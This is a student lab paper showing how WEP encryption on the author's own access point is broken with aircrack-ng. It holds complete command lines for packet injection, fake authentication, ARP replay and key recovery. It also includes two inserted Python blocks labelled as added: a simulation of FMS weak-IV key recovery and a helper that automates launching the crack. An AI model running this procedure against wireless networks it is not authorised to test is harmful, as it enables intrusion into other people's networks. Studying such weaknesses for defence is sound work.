Wired Equivalent Privacy Vulnerability Testing
Mark Diehl
Webster University


Contents

Abstract
Intro
Hardware and software
    Attacker Operating System
    Client Operating System
    Wireless Adapter
    Access Point
    Aircrack-ng Software Suite
    Airmon-ng
    Airodump-ng
    Aireplay-ng
    Aircrack-ng
Process
    Step 1
    Step 2
    Step 3
    Step 4
    Step 5
Results
    Step 1
    Step 2
    Step 3
    Step 4
    Step 5
Conclusion
References
Acknowledgements


Abstract

In this experiment I will set up a WEP-encrypted wireless access point and then use the Aircrack-ng software suite to extract the key from captured packets. I will employ previously demonstrated methods of breaking WEP encryption and explain how each process works. The experiment demonstrates why wireless networks that use WEP encryption are virtually unprotected.

Intro

The following chart shows the current state of wireless network security at 424 businesses in North America. Finneran's study for InformationWeek shows that of the 424 respondents, excluding those that use no wireless security, 64 (15%) use antiquated WEP encryption and are therefore virtually unprotected (Finneran, 2013).

Figure A: Wireless LAN Security (Finneran, 2013). Percentage of respondents by wireless security type, 2012 versus 2013, as read from the chart:

                 2012    2013
    WPA2          64%     73%
    WEP           24%     15%
    Other         10%      9%
    None           2%      3%

This experiment is designed to show how easily one can recover a WEP key and access a supposedly protected wireless network. The results demonstrate the well-known fact that breaking WEP encryption is fast, cheap, and easy.

Hardware and software

This section describes the hardware and software selected for the experiment. All hardware and software was already owned by the researcher at the time of the experiment, and some of the equipment is nearly 5 years old. Excluding the client and attacker operating systems and machines, the total cost of this experiment is estimated at 55 USD, well within any war driver's price range.

Attacker Operating System

A Live USB installation of Ubuntu 13.10, a Linux distribution, was selected as the attacker operating system (Canonical Ltd., 2013). The OS was written to a 4GB USB 2.0 flash drive with UNetbootin. All WEP cracking software executes on this OS. The OS was free; the USB flash drive is estimated at 10 USD.

Client Operating System

The client managing the access point runs Windows 8.1 Pro on a Microsoft Surface Pro. This machine plays the part of the network administrator: it is used to manage the access point's service set identifier (SSID) and WEP key, and to generate network traffic.

Wireless Adapter

The wireless adapter selected for this experiment is a Sanoxy WA-U150W. It uses the Realtek RTL8188CU chipset, for which Linux drivers with monitor mode and packet injection support are available, and it supports IEEE 802.11b/g/n. The adapter's MAC address is 00:9E:95:9C:48:AF; finding the adapter's MAC address is covered in step 3 of the process. The adapter was purchased for 15 USD.


Access Point

The access point selected for this experiment is a D-Link DIR-615. It offers a full management dashboard where an administrator can change the SSID and WEP key. The dashboard is reached by browsing to 192.168.0.1. The admin login is not password protected for this experiment. The access point's MAC address (BSSID) is 00:1E:58:F4:9B:3B. The access point cost approximately 30 USD.

Aircrack-ng Software Suite

The Aircrack-ng software suite contains nearly 20 programs designed to monitor, capture, and inject network traffic and to recover WEP and WPA-PSK keys. Only 4 of them were required for this experiment: airmon-ng, airodump-ng, aireplay-ng, and aircrack-ng. All tools are available for free for Linux from aircrack-ng.org (aircrack-ng, 2013).

Airmon-ng

This script enables monitor mode on a wireless interface. A monitor-mode interface can then be used to sniff and inject raw 802.11 frames. Not all wireless chipsets support monitor mode; the Realtek chipset in the Sanoxy adapter does, which is the main reason for its selection (aircrack-ng, 2013).

Airodump-ng

This program captures raw 802.11 frames from a monitor-mode interface and writes them to capture files. It is well suited to collecting WEP initialization vectors (IVs), including the ones provoked by aireplay-ng in later steps. Once enough IVs have been collected, the capture files are fed to aircrack-ng (aircrack-ng, 2013).


Aireplay-ng

Aireplay-ng injects frames in order to generate network traffic. It has several modes of operation; the modes used in this experiment are the injection test, fake authentication, and the ARP request replay attack. The injection test determines whether an interface can inject packets, and fake authentication associates the interface with the access point so that the other aireplay-ng attacks are accepted. The ARP request replay attack is the most effective way to generate IVs: the program listens for an encrypted ARP request and retransmits it to the access point, which rebroadcasts it, and every retransmission is encrypted with a new IV. The ARP request does not need to be decrypted to be recognised, since WEP does not authenticate frames and an encrypted ARP request has a fixed, recognisable length and a broadcast destination. Capturing continues until enough IVs are available for aircrack-ng to crack the network key (aircrack-ng, 2013).

Aircrack-ng

Aircrack-ng is a WEP and WPA/WPA2-PSK key cracking program. It can recover a WEP key once enough encrypted packets have been captured with airodump-ng. For WEP it first uses statistical methods to narrow each key byte down to a few candidates and then brute-forces the rest. The statistical techniques rest on the fact that certain IVs "leak" information about particular key bytes: when the right kind of IV is captured for a key byte, the probability that a given value is the correct one for that byte goes up. Aircrack-ng runs a series of such tests, accumulating votes for each key byte until the most probable value for each byte has been found, and then tests the resulting key against the captured packets to confirm it. The more IVs have been collected, the less time aircrack-ng needs to spend brute forcing. The key was limited to 64 bits for the sake of time. The aircrack-ng documentation's figure for the older KoreK statistical attacks is around 250,000 IVs for a 64-bit key, gathered at a rate of about 3,000 per minute; the PTW attack that aircrack-ng uses by default needs far fewer, on the order of tens of thousands, which matches the results reported below. Once enough IVs have been collected aircrack-ng recovers the WEP key in less than 1 minute (aircrack-ng, 2013).
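The voting idea described above, as an added, self-contained illustration (not code from the paper or from aircrack-ng): a Python simulation of the original Fluhrer-Mantin-Shamir (FMS) attack, the first of the statistical techniques that aircrack-ng's KoreK and PTW attacks descend from. It keys RC4 the way WEP does (a 3-byte IV prepended to a 40-bit secret), assumes the attacker knows the first plaintext byte of every frame (the 0xAA SNAP byte, a standard WEP fact the paper does not state), and gives the attacker only the classic weak IVs of the form (A+3, 255, X). Each "resolved" frame casts one vote for one key byte; the top candidates per byte are then brute-forced and the full key confirmed against captured frames, which is the role the paper assigns to the fudge factor. The secret key is random and the RC4 code and frame set are constructed for the example.

```python
"""FMS weak-IV attack on WEP's RC4 keying, simulated end to end: a 40-bit
secret behind 3-byte IVs is recovered from (IV, first ciphertext byte) pairs
by per-byte voting, then confirmed against captured frames. Added
illustration; not code from the paper or from aircrack-ng."""
import random
from collections import Counter

N = 256
SNAP = 0xAA   # first plaintext byte of every WEP data frame (802.2 SNAP header)


def ksa(key):
    """RC4 key scheduling: returns the permutation S for the given key bytes."""
    S = list(range(N))
    j = 0
    for i in range(N):
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    return S


def first_keystream_byte(per_packet_key):
    """First PRGA output byte for key = IV || secret; WEP XORs it with SNAP."""
    S = ksa(per_packet_key)
    j = S[1]
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) % N]


def capture(secret, ivs):
    """Simulated sniffer output: (IV, first ciphertext byte) for each frame."""
    return [(iv, first_keystream_byte(list(iv) + secret) ^ SNAP) for iv in ivs]


def fms_candidate(iv, c0, known):
    """Guess for secret byte number len(known) from one frame, or None when
    the IV is not 'resolved' for that position (the FMS condition)."""
    A = len(known)
    key = list(iv) + known                 # the A+3 key bytes already known
    S = list(range(N))
    j = 0
    for i in range(A + 3):                 # run the KSA only that far
        j = (j + S[i] + key[i]) % N
        S[i], S[j] = S[j], S[i]
    if S[1] >= A + 3 or (S[1] + S[S[1]]) % N != A + 3:
        return None
    # With probability ~5% the rest of the KSA leaves S[1], S[S[1]] and S[A+3]
    # alone; the first output byte is then S[A+3] after step A+3, which is
    # S[j_next] with j_next = j + S[A+3] + K[A+3]. Invert that for K[A+3].
    out = c0 ^ SNAP
    return (S.index(out) - j - S[A + 3]) % N


def vote(frames, known):
    """Accumulate votes for the next secret byte over all resolved frames."""
    votes = Counter()
    for iv, c0 in frames:
        cand = fms_candidate(iv, c0, known)
        if cand is not None:
            votes[cand] += 1
    return votes


def key_fits(secret, frames, checks=8):
    """Confirm a candidate key by re-encrypting a few captured frames."""
    return all(first_keystream_byte(list(iv) + secret) ^ SNAP == c0
               for iv, c0 in frames[:checks])


def recover_key(frames, key_len=5, fudge=8):
    """Byte-by-byte voting with backtracking over the top `fudge` candidates
    per byte (the job of aircrack-ng's fudge factor), confirming the full key."""
    def search(known):
        if len(known) == key_len:
            return known if key_fits(known, frames) else None
        for byte, _ in vote(frames, known).most_common(fudge):
            found = search(known + [byte])
            if found is not None:
                return found
        return None
    return search([])


def demo(seed=1):
    """Random 40-bit secret, one frame per weak IV (A+3, 255, X), recovery."""
    rng = random.Random(seed)
    secret = [rng.randrange(N) for _ in range(5)]
    # The classic FMS class only; real traffic carries many more usable IV
    # classes, which is what lets aircrack-ng succeed with fewer frames.
    ivs = [(a + 3, N - 1, x) for a in range(5) for x in range(N)]
    rng.shuffle(ivs)
    return secret, recover_key(capture(secret, ivs))


if __name__ == "__main__":
    secret, recovered = demo()
    print("secret   :", bytes(secret).hex())
    print("recovered:", None if recovered is None else bytes(recovered).hex())
```

Only about one resolved frame in twenty actually votes for the right value, and every other frame votes for a random byte, which is why the correct byte wins by accumulation rather than by certainty and why a wrong top candidate has to be caught by the final confirmation step.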

Process

This section describes the steps I took in breaking WEP encryption. All commands must be run as root: start with sudo -s, which gives every subsequent command in that shell administrator privileges.

Step 1

The first step uses airmon-ng to create a new wireless interface in monitor mode. Monitor mode lets the adapter sniff every frame on the channel and inject frames without being associated with an access point (AP). Depending on the driver, the new interface gets one of several names: the legacy madwifi-ng driver for Atheros chipsets exposes wifi0 and ath0 interfaces, whereas mac80211 drivers such as the Realtek one used here create mon0. Since this experiment used the Realtek driver, the first step results in the creation of interface mon0, and that name is used whenever an interface is required in subsequent steps.

Terminal input:
    airmon-ng stop wlan0
    airmon-ng start wlan0 [AP Channel]

It is recommended to use aireplay-ng to test the interface’s ability to inject packets into the network. This test may be conducted against a specific access point or against all access points in range of the adapter. In the syntax of aireplay-ng, -9 will start the injection test.


Terminal input:
    aireplay-ng -9 mon0

The results of this test list the access point's SSID, MAC address, and channel. If the monitor interface set up in step 1 is not on the access point's channel, change it with (Wireless Defence, 2013):

Terminal input:
    iwconfig mon0 channel [channel number]

Step 2

Airodump-ng is started to capture packets. The user must know the access point's channel, the access point MAC address (BSSID), a capture file prefix, and an interface in monitor mode. The channel and BSSID were determined by the injection test in step 1. The capture file prefix should be a unique identifier specific to the test being run.

Terminal input:
    airodump-ng -c [AP channel] --bssid [AP MAC] -w [capture file prefix] mon0

This terminal is dedicated to the airodump-ng process until the experiment is complete; subsequent steps require a new terminal.


Step 3

The next step is to fake an authentication and association with the access point using aireplay-ng. This step requires the access point SSID, the access point MAC address, the wireless interface's MAC address, and the monitor interface.

Terminal input:
    aireplay-ng -1 0 -e [AP SSID] -a [AP MAC] -h [interface MAC] mon0

In the syntax of aireplay-ng, -1 selects fake authentication and the following 0 is the reassociation delay in seconds, so the interface authenticates once and does not periodically reassociate. The -h value must be the adapter's actual MAC address (or the adapter's address must be changed to match it), otherwise the access point's replies are not delivered to the adapter and later injection fails. The access point SSID and MAC address were found in the injection test in step 1, and the wireless interface's MAC address can be read from:

Terminal input:
    ip addr

When an access point is not broadcasting its SSID there are additional steps to take with aireplay-ng, but for this experiment the access point was set to broadcast the SSID (Wireless Defence, 2013).

Step 4

The next step is generating new IVs for airodump-ng to collect. Aireplay-ng is used to start an ARP request replay attack, using the access point MAC address, interface MAC address, and monitor-mode interface from the previous steps.


Terminal input:
    aireplay-ng -3 -b [AP MAC] -h [interface MAC] mon0

Aireplay-ng begins generating new IVs within a few minutes, as soon as it has captured an ARP request to replay, and then produces around 3,000 every minute it continues to run. In the syntax of aireplay-ng, -3 starts the ARP request replay attack. This terminal is dedicated to the aireplay-ng process until the experiment is complete; subsequent steps require a new terminal.

Step 5

Once enough IVs have been collected, aircrack-ng can start recovering the key from the captured packets. The documentation's figure for a 64-bit key is as many as 250,000 IVs.

Terminal input:
    aircrack-ng -a 1 -1 -n [Key length] -b [AP MAC] [capture file prefix]*.cap

Aircrack-ng offers several switches to narrow the key search. The switch -a 1 forces WEP cracking mode, -1 tells aircrack-ng to make a single PTW attempt instead of retrying as new IVs arrive, -n sets the key length in bits, and -b restricts the search to packets from the given access point (BSSID). The capture file prefix must match the prefix given to airodump-ng in step 2, since the capture files contain the IVs airodump-ng collected. If enough IVs have been collected, aircrack-ng should take only about a minute to recover the WEP key. If it fails, wait for airodump-ng to collect more IVs and make another attempt.
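Steps 2 to 5 leave the operator watching the airodump-ng window and re-running aircrack-ng by hand. The following added Python helper (not from the paper or the aircrack-ng project) reads the CSV summary that airodump-ng writes next to the capture as <prefix>-01.csv, waits until the target BSSID's "# IV" column passes a threshold, and then runs the step 5 command line. It also builds a timestamped capture prefix and refuses to reuse one, because stale capture files with the same prefix get fed to aircrack-ng together with the new ones. The CSV column layout is assumed from airodump-ng 1.x, and the embedded sample CSV is constructed, using the paper's access point and adapter MAC addresses.

```python
"""Poll airodump-ng's CSV summary for a target BSSID and hand the capture to
aircrack-ng once enough IVs are in. Added example, not the paper's or the
aircrack-ng project's code. Assumes the CSV layout airodump-ng 1.x writes
to <prefix>-01.csv (AP table, blank line, station table)."""
import csv
import glob
import io
import re
import subprocess
import time
from datetime import datetime

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

# Constructed sample in airodump-ng's CSV layout; the BSSID and station MAC
# are the access point and adapter used in the paper.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:1E:58:F4:9B:3B, 2013-12-01 10:00:00, 2013-12-01 10:06:30,  6,  54, WEP , WEP,    , -40,      900,    16384,   0.  0.  0.  0,   7, weptest, 
AA:BB:CC:DD:EE:01, 2013-12-01 10:00:01, 2013-12-01 10:06:29, 11,  54, WPA2, CCMP, PSK, -70,      300,        0,   0.  0.  0.  0,   8, neighbor, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:9E:95:9C:48:AF, 2013-12-01 10:01:00, 2013-12-01 10:06:30, -30,    15000, 00:1E:58:F4:9B:3B, weptest
"""


def parse_airodump_csv(text):
    """Return {BSSID: {channel, privacy, ivs, essid}} from the AP table."""
    aps = {}
    in_ap_table = True
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row:
            continue
        if row[0].startswith("Station MAC"):
            in_ap_table = False          # everything after this is client rows
        if not in_ap_table or len(row) < 14 or not MAC_RE.match(row[0]):
            continue                     # header, blank or malformed line
        aps[row[0].upper()] = {
            "channel": int(row[3]),
            "privacy": row[5].strip(),
            "ivs": int(row[10]),         # the "# IV" column drives the decision
            "essid": row[13].strip(),
        }
    return aps


def fresh_prefix(base, stamp=None):
    """Unique capture prefix: reusing a prefix makes aircrack-ng read stale
    capture files from earlier runs along with the new ones."""
    stamp = stamp or datetime.now().strftime("%Y%m%d-%H%M%S")
    prefix = f"{base}-{stamp}"
    if glob.glob(f"{prefix}*"):
        raise FileExistsError(f"capture files already exist for {prefix}")
    return prefix


def aircrack_argv(prefix, bssid, key_bits=64, caps=None):
    """Step 5 command line: -a 1 WEP mode, -1 a single PTW attempt,
    -n key length in bits, -b restrict to the target BSSID."""
    if not MAC_RE.match(bssid):
        raise ValueError(f"not a MAC address: {bssid}")
    if caps is None:
        caps = sorted(glob.glob(f"{prefix}*.cap"))
    return ["aircrack-ng", "-a", "1", "-1", "-n", str(key_bits), "-b", bssid, *caps]


def ivs_collected(csv_text, bssid):
    """IV count for the target, or None if airodump-ng has not seen it yet."""
    ap = parse_airodump_csv(csv_text).get(bssid.upper())
    return None if ap is None else ap["ivs"]


def wait_and_crack(prefix, bssid, threshold=20000, poll=15, launch=True):
    """Block until the target has at least `threshold` IVs, then run step 5.
    Returns the argv used (a dry run when launch=False)."""
    while True:
        try:
            with open(f"{prefix}-01.csv", encoding="utf-8", errors="replace") as f:
                ivs = ivs_collected(f.read(), bssid)
        except FileNotFoundError:
            ivs = None                   # airodump-ng has not written the file yet
        if ivs is not None and ivs >= threshold:
            break
        print(f"{bssid}: {'not seen' if ivs is None else ivs} IVs, waiting ...")
        time.sleep(poll)
    argv = aircrack_argv(prefix, bssid)
    if launch:
        subprocess.run(argv, check=False)
    return argv


if __name__ == "__main__":
    print(ivs_collected(SAMPLE_CSV, "00:1e:58:f4:9b:3b"))
```

In use, the prefix from fresh_prefix is passed to airodump-ng's -w in step 2 and then to wait_and_crack, so the helper only ever sees capture files from the current run; the threshold is deliberately above the 12,000 to 18,000 IVs reported in the results, because aircrack-ng's single attempt either succeeds or has to be repeated after more IVs arrive.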

Results

The results section documents the results of each step of the process as I performed the experiments. Critical facts or processes are noted for reference in future experiments.

Step 1

When I first started testing my wireless adapter's ability to inject packets I was finding that it was incapable of entering monitor mode. I had to patch the IEEE 802.11 drivers per aircrack-ng.org's instructions for my specific chipset. Afterwards I was able to successfully inject packets without issue.

Step 2

A few things to note about this step are the channel requirement and the capture file prefix. The wireless adapter must be listening on the same channel as the access point or the next steps will fail. I found that if I used the same prefix as past tests then all the old capture files along with the newly generated capture files would be used in the aircrack-ng program. I found success in coming up with a unique name for the capture files for each test.

Step 3

I attempted to run an experiment when the access point was not broadcasting the SSID and found that I was unable to efficiently find the access point name. Wireless Defence provides a method of finding an access point's SSID by disassociating an associated client and then listening for the handshake request (Wireless Defence, 2013). I found that adding this step did little to further the overall goal of the experiment. I conducted all further experiments with the access point continuously broadcasting the SSID.


Step 4

I found the operation of aireplay-ng to vary depending on the number of clients associated with the access point. My initial tests had no associated clients and aireplay-ng generated approximately 10 IVs per second. This meant that collecting enough IVs to recover the WEP key would take 25 - 30 minutes. I found that if I associated only a single client with the access point, IVs were generated at a rate of approximately 40 per second, giving me all the IVs I needed in just over 6 minutes. I found that for a 64 bit WEP key I needed between 12,000 and 18,000 IVs to perform a successful recovery.

Step 5

Aircrack-ng offers a wide array of switches to optimize its cracking performance, from key length limiters to dictionary files to fudge factors. The fudge factor controls how far beyond the most-voted candidates aircrack-ng brute forces each key byte. I found that limiting the key length to 64 bits, limiting the statistical methods to only attempt to solve for WEP keys, filtering the IVs by the access point's MAC address, and increasing the fudge factor really sped up the process. Aircrack-ng was able to find the WEP key in under a minute with only about 5% of the recommended 250,000 IVs.

Conclusion

This experiment has demonstrated how an inexperienced Linux user can easily break into a WEP protected wireless network. While my results show that WEP networks are practically wide open, it appears that within the next few years WEP networks will be a thing of the past. Their use has dropped to nearly 60% of what it was a year ago. I estimate that if the current trend continues the number of WEP networks will be insignificant within 5 years.

References

aircrack-ng. (2013, December). Simple WEP crack. Retrieved from aircrack-ng.org: http://www.aircrack-ng.org/doku.php?id=simple_wep_crack

Canonical Ltd. (2013, December). Download Ubuntu Desktop. Retrieved from ubuntu.com: http://www.ubuntu.com/download/desktop

Finneran, M. (2013, June). 2013 State of Mobile Security. Retrieved from reports.informationweek.com: http://reports.informationweek.com/abstract/18/10935/Mobility-Wireless/Research:2013-State-Of-Mobile-Security.html

Wireless Defence. (2013, December). wirelessdefence.org. Retrieved from http://www.wirelessdefence.org/Contents/LinuxWirelessCommands.htm

Acknowledgements

To Samantha, for putting up with my “rage mornings” after I pulled multiple all-nighters researching this topic and running multiple hour long experiments. Yes, I know our wireless network sucks. Thanks for being the level-headed one and for being my better half. To Al, for allowing me to explore my own interests in the computer security field and being open to the idea in the first place. Were it not for your support my research would have ended up becoming some banal reproduction of commonly known facts and figures. I look forward to expanding my research into other areas of computer security. Thank you. To Tom, for knowing way more on every topic I would ever be interested in and for teaching me, albeit implicitly, that a simple answer usually isn’t the best answer. To Chris, for setting me on my path at Webster that has ultimately led me to where I am now professionally, academically, and personally. I don’t know what would have become of me had you not stopped me that fateful day at the printer. Thanks! And finally to Nooter Eriksen, for overlooking my rogue access point, thanks.